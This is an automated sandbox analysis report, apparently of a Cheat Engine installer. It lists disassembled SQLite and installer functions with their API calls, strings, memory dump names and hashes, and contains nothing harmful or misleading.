Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
String ID: 0
API String ID: 121741435-4108050209
Opcode ID: c7331f497d381d67ccb600d58e39c8a139b0aff61050bae7fa7755f7afd3b389
Instruction ID: 46708ede5264ce94f4bfe110855788f8f671bb16581b1ad8f3f4be9d7c31edb2
Opcode Fuzzy Hash: c7331f497d381d67ccb600d58e39c8a139b0aff61050bae7fa7755f7afd3b389
Instruction Fuzzy Hash: 055138B0A11B04DFD718CF68C580A6AB7F5FB88304F1089ADE44ACB745EB79EA41CB50

Function 6BC1EBD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC1EBFD
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC1ECCF

Strings

, xrefs: 6BC1EC53

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-3916222277
Opcode ID: b9b5be579b356a45b591c4eb27929d654f7cb1870caf25351cad5cb2bdf03f46
Instruction ID: fa5f936012e9d36d3034724297e0944351077e994b5952593f5825b130a89e44
Opcode Fuzzy Hash: b9b5be579b356a45b591c4eb27929d654f7cb1870caf25351cad5cb2bdf03f46
Instruction Fuzzy Hash: 234128B6E296056BDB11CF69DC406AAFBB9DFC0214F1440E9E888D7301F7399B05D790

Function 6BC30B60 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC30C6B

Strings

too many FROM clause terms, max: %d, xrefs: 6BC30BA6
H, xrefs: 6BC30C3A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: H$too many FROM clause terms, max: %d
API String ID: 2102423945-1622072631
Opcode ID: f62485e647cc9852d5ed874c4db16961da909a0a6d4fc04e6f854f71aad14e17
Instruction ID: 1dc4eefd65532ea72ffbdb10ecc41af3c114a07de57bb63973954d93ad0be362
Opcode Fuzzy Hash: f62485e647cc9852d5ed874c4db16961da909a0a6d4fc04e6f854f71aad14e17
Instruction Fuzzy Hash: D541F473F021249FCB14CF68CC90B9973A6EB84325F4982BDD815DB384FA38AA158780

Function 6BC934F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC935C4

Strings

default value of column [%s] is not constant, xrefs: 6BC9358C
cannot use DEFAULT on a generated column, xrefs: 6BC935A8

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: cannot use DEFAULT on a generated column$default value of column [%s] is not constant
API String ID: 2102423945-2211344978
Opcode ID: 6e6697a2532321a164e14621984ff30529c4298b53682d3b516af0b88f9210ab
Instruction ID: f82b6b8db6e02de7874d1ca44618c501a9d8c3443a50590bbf136fb0815e5318
Opcode Fuzzy Hash: 6e6697a2532321a164e14621984ff30529c4298b53682d3b516af0b88f9210ab
Instruction Fuzzy Hash: 454121705143409BD300DF28E881B9BB7A5AFC8708F04495CF9589B342E779EB59CBE6

Function 6BC2CE40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2CEE0

Strings

cannot use RETURNING in a trigger, xrefs: 6BC2CE59
sqlite_returning, xrefs: 6BC2CF09, 6BC2CF4A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: cannot use RETURNING in a trigger$sqlite_returning
API String ID: 2102423945-753984552
Opcode ID: 170429eab43a466a938597c7c9eef08ca1843d5f3ac79d210257c7e26016a8b9
Instruction ID: 9cfe00904a69d9bdb264087074f367f012f21d8d7b9b05fd698780155b353e56
Opcode Fuzzy Hash: 170429eab43a466a938597c7c9eef08ca1843d5f3ac79d210257c7e26016a8b9
Instruction Fuzzy Hash: 8241F670A10701ABE700CF68D882B4BB7B8BF44718F504569E9189B341F739E765CBA1

Function 6BC158A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC158E8
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC1595B

Strings

unicode61, xrefs: 6BC158B5, 6BC158F9

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d._memset
String ID: unicode61
API String ID: 1786038377-820661299
Opcode ID: 8128e24be55f86f98fb23470b84d0fd2503848f506a0f3c7ad440d0db9e1e405
Instruction ID: 9d984fe685a2e11bb1c5052b3846858ffff99fd6194c5baa9526c2bf1d374ef9
Opcode Fuzzy Hash: 8128e24be55f86f98fb23470b84d0fd2503848f506a0f3c7ad440d0db9e1e405
Instruction Fuzzy Hash: CE218E727252005BD700CE69DC41B9BB3D9EF84235F044169FE68DB240FA79EA1687A2

Function 6BC3FE10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

SI5b4aedd0c04bd151.SQLITE.INTEROP(?), ref: 6BC3FE4D
SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC3FEFB

Strings

second argument to nth_value must be a positive integer, xrefs: 6BC3FEBD

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I1bf8975e567ea97a.I5b4aedd0c04bd151.
String ID: second argument to nth_value must be a positive integer
API String ID: 4239521264-2620530100
Opcode ID: ed4c6131f707300c056bf17860c0dc186b7dc6c34cac45c9b20700e6a923a9ac
Instruction ID: 251f5e406bf9df839697ddb5689eb70e00661be52075c8c4bcda5d0dbff22fea
Opcode Fuzzy Hash: ed4c6131f707300c056bf17860c0dc186b7dc6c34cac45c9b20700e6a923a9ac
Instruction Fuzzy Hash: 0B315B72A2D6215FCB009F69D88174573A0BF42328F904EA9EC6887382F739DB05C7D1

Function 6BC489A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC489FD
SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC48A54

Strings

Invalid argument to rtreedepth(), xrefs: 6BC48A72

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I1bf8975e567ea97a.Iffb8076c269e2a85.
String ID: Invalid argument to rtreedepth()
API String ID: 4143718659-2843521569
Opcode ID: e210d6c7cb3337c69ab2435f98e7cdcabdcbdb06efcf4a65ddb494f1915926b0
Instruction ID: fa9275f2b689f6cc64951c5caccf9583e60a303802db13eaf0a43674ecd8cb66
Opcode Fuzzy Hash: e210d6c7cb3337c69ab2435f98e7cdcabdcbdb06efcf4a65ddb494f1915926b0
Instruction Fuzzy Hash: 312139B2A152044BD710CF2DD841B6673A4EF86235F1403AAED6CCB281F72ADB56C3E1

Function 6BCCB6C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(%z%s"%w"."%w"."%w"="%w"."%w"."%w",00000000,6BD06F50,?,?,?,00000000,?,?,?,?,6BCE2180,?,?,?,?), ref: 6BCCB6F0

Strings

AND , xrefs: 6BCCB6F8
%z%s"%w"."%w"."%w"="%w"."%w"."%w", xrefs: 6BCCB6EB

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Idb45e174afb28e2c.
String ID: AND $%z%s"%w"."%w"."%w"="%w"."%w"."%w"
API String ID: 778684903-433850526
Opcode ID: eaa7bb45d84f2d52de8799223729118ae719fd28fb0f6d08b86ad1971c695ead
Instruction ID: 77c63094fbc1712eb4f8ccd0145c27f5ec923c3d559a10a17b8d1e6c401925c0
Opcode Fuzzy Hash: eaa7bb45d84f2d52de8799223729118ae719fd28fb0f6d08b86ad1971c695ead
Instruction Fuzzy Hash: 17F08CB15251596B9B148FA0EC41DAB3AAADB94354B10806DFC058A240FB38AD82C7B2

Function 6BCCE5C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(unable to use function %s in the requested context,?), ref: 6BCCE5D7
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,000000FF,000000FF,00000001,000000FF,unable to use function %s in the requested context,?), ref: 6BCCE5F6

Strings

unable to use function %s in the requested context, xrefs: 6BCCE5D2

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
String ID: unable to use function %s in the requested context
API String ID: 3537641774-47290733
Opcode ID: 933fad20cf2b9c9f3eea811db992edf7978413dfb63a1024b24b3c268df15669
Instruction ID: 213d828f9d251cbcc8907ac8cea79d8cdbcb32f7ca95f1dd53b70f312b0e9e44
Opcode Fuzzy Hash: 933fad20cf2b9c9f3eea811db992edf7978413dfb63a1024b24b3c268df15669
Instruction Fuzzy Hash: 6CE092315285146BCB209B5CDC41EA6B3EC8B8A738F200315B878A73D0EEA5A94046A6

Function 6BC2C290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2C29C
_memset.LIBCMT ref: 6BC2C2AF

Strings

out of memory, xrefs: 6BC2C2D1

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: out of memory
API String ID: 2102423945-2599737071
Opcode ID: 7341a1fb35f5da7fa8470aea686737c756178c929aea37ba71d34a8ed6d4e717
Instruction ID: e85011fafe2fe3a4c269911dda5bd911a7bbb6b0257c1c6e839a15b68311a881
Opcode Fuzzy Hash: 7341a1fb35f5da7fa8470aea686737c756178c929aea37ba71d34a8ed6d4e717
Instruction Fuzzy Hash: 1CE06DB0952B4066E214DB309C02F86B794AB60705F50852CE699062C1EBBC71588BD9

Function 6BC3FA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(json_%s() needs an odd number of arguments), ref: 6BC3FA4E
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,000000FF,000000FF,00000001,000000FF,json_%s() needs an odd number of arguments), ref: 6BC3FA6D

Strings

json_%s() needs an odd number of arguments, xrefs: 6BC3FA49

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
String ID: json_%s() needs an odd number of arguments
API String ID: 3537641774-3040682063
Opcode ID: 25525ee5ceee28e66ad1008f17f56170918af367c0060aff60e0302338eeb7e1
Instruction ID: 4a783d22bc4289e84b23023b33ddaa7f9e33c916919a4b72ef4b032a1f97442d
Opcode Fuzzy Hash: 25525ee5ceee28e66ad1008f17f56170918af367c0060aff60e0302338eeb7e1
Instruction Fuzzy Hash: 5BE01D7147953576DA10666C5C46EA6729C8B0623CF200351BC38A62D1FF952A5041FB

Analysis Process: CheatEngine75.tmpPID: 6476, Parent PID: 2148COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	550
Total number of Limit Nodes:	15

Executed Functions

Function 6B4C6180 Relevance: 6.1, APIs: 4, Instructions: 64
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00000104,?,00000006,?,00000000,?,6B4D0415,?,00000104,00000000,?,?,6B4D3DD6,0000E006,?,00000100), ref: 6B4C6198
LoadResource.KERNEL32(00000104,00000000,?,?,6B4D0415,?,00000104,00000000,?,?,6B4D3DD6,0000E006,?,00000100,?,?), ref: 6B4C61AC

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Resource$FindLoad
String ID:
API String ID: 2619053042-0
Opcode ID: 4772a4624f4284c5a8d46effbad2128205ee1ea8f6f1b0fe9a8aab90c114b245
Instruction ID: db38925b887a5ac16b211635bad4b846bd61ff5cab2209f6520ea0f9c667a945
Opcode Fuzzy Hash: 4772a4624f4284c5a8d46effbad2128205ee1ea8f6f1b0fe9a8aab90c114b245
Instruction Fuzzy Hash: 5401D677F042255BDB205E69AC448B7B36CEBC4667701A527FD49D7302EA35D80047E1

Function 6B4C3BF0 Relevance: 4.6, APIs: 3, Instructions: 55
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6B4C3C17
Process32FirstW.KERNEL32(00000000,0000022C), ref: 6B4C3C27
Process32NextW.KERNEL32(00000000,0000022C), ref: 6B4C3C53

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Process32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1238713047-0
Opcode ID: a73fe3f468f720045bcb1cd697e4b3a2baa19bc52622fbd782dba830be607b62
Instruction ID: 4dae50ef10f3669132464889c274330b2f0821e9f8529c86f5e7a3e5a9247386
Opcode Fuzzy Hash: a73fe3f468f720045bcb1cd697e4b3a2baa19bc52622fbd782dba830be607b62
Instruction Fuzzy Hash: 9B01A17260010C6BDB20EA669D85FEE73ACEB45310F0001AAE905C7241DB399A148BB5

Function 6B4FD06C Relevance: 72.1, APIs: 35, Strings: 6, Instructions: 370
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4FD076

Part of subcall function 6B4D4BD7: __EH_prolog3.LIBCMT ref: 6B4D4BDE
Part of subcall function 6B4D4BD7: GetWindowDC.USER32(00000000,00000004,6B4FD606,00000000), ref: 6B4D4C0A

GetDeviceCaps.GDI32(?,00000058), ref: 6B4FD096
DeleteObject.GDI32(00000000), ref: 6B4FD100
DeleteObject.GDI32(00000000), ref: 6B4FD11E
DeleteObject.GDI32(00000000), ref: 6B4FD13C
DeleteObject.GDI32(00000000), ref: 6B4FD15A
DeleteObject.GDI32(00000000), ref: 6B4FD178
DeleteObject.GDI32(00000000), ref: 6B4FD196
DeleteObject.GDI32(00000000), ref: 6B4FD1B4
DeleteObject.GDI32(00000000), ref: 6B4FD1D2
DeleteObject.GDI32(00000000), ref: 6B4FD1F0
DeleteObject.GDI32(00000000), ref: 6B4FD20E
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6B4FD246
lstrcpyW.KERNEL32(?,?), ref: 6B4FD296
EnumFontFamiliesW.GDI32(?,00000000,6B4FCA05,Segoe UI), ref: 6B4FD2BD
lstrcpyW.KERNEL32(?,Segoe UI), ref: 6B4FD2D0
EnumFontFamiliesW.GDI32(?,00000000,6B4FCA05,Tahoma), ref: 6B4FD2EE
lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6B4FD308
CreateFontIndirectW.GDI32(?), ref: 6B4FD312
CreateFontIndirectW.GDI32(?), ref: 6B4FD363
CreateFontIndirectW.GDI32(?), ref: 6B4FD3A2
CreateFontIndirectW.GDI32(?), ref: 6B4FD3CE
CreateFontIndirectW.GDI32(?), ref: 6B4FD3EF
GetSystemMetrics.USER32(00000048), ref: 6B4FD40E
lstrcpyW.KERNEL32(?,Marlett), ref: 6B4FD421
CreateFontIndirectW.GDI32(?), ref: 6B4FD42B
GetStockObject.GDI32(00000011), ref: 6B4FD457
GetObjectW.GDI32(00000000,0000005C,?), ref: 6B4FD46E
lstrcpyW.KERNEL32(?,Arial,?,?,00000000), ref: 6B4FD4AB
CreateFontIndirectW.GDI32(?), ref: 6B4FD4B5
CreateFontIndirectW.GDI32(?), ref: 6B4FD4CE
GetStockObject.GDI32(00000011), ref: 6B4FD4E2
GetObjectW.GDI32(?,0000005C,?), ref: 6B4FD4F7
CreateFontIndirectW.GDI32(?), ref: 6B4FD505
CreateFontIndirectW.GDI32(?), ref: 6B4FD526

Part of subcall function 6B4FD9BE: __EH_prolog3_GS.LIBCMT ref: 6B4FD9C5
Part of subcall function 6B4FD9BE: GetTextMetricsW.GDI32(?,?), ref: 6B4FD9FA
Part of subcall function 6B4FD9BE: GetTextMetricsW.GDI32(?,?), ref: 6B4FDA3B

Strings

Segoe UI, xrefs: 6B4FD2AB, 6B4FD2C7
MS Sans Serif, xrefs: 6B4FD302
Tahoma, xrefs: 6B4FD2DC, 6B4FD2FB
Marlett, xrefs: 6B4FD41B
0#Lk, xrefs: 6B4FD566
Arial, xrefs: 6B4FD49B

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CapsCharsetDeviceH_prolog3InfoSystemWindow
String ID: 0#Lk$Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
API String ID: 3506729969-143176737
Opcode ID: 3b4fe98a8ef789c404879533378f55024f5f217a650947d9d8a5f9e2e2f9cdd2
Instruction ID: e8c4d026ad8ad1aa78104290f3cdcdb91e00c354fb5fd106cd2198c5a0bd507a
Opcode Fuzzy Hash: 3b4fe98a8ef789c404879533378f55024f5f217a650947d9d8a5f9e2e2f9cdd2
Instruction Fuzzy Hash: 22E15CB09006499BDF21AFB1CD48FDEBBB8AF45305F0084A9E25AE7291DB78D945CF50

Function 6B600A24 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6B600A6B
___scrt_uninitialize_crt.LIBCMT ref: 6B600A85
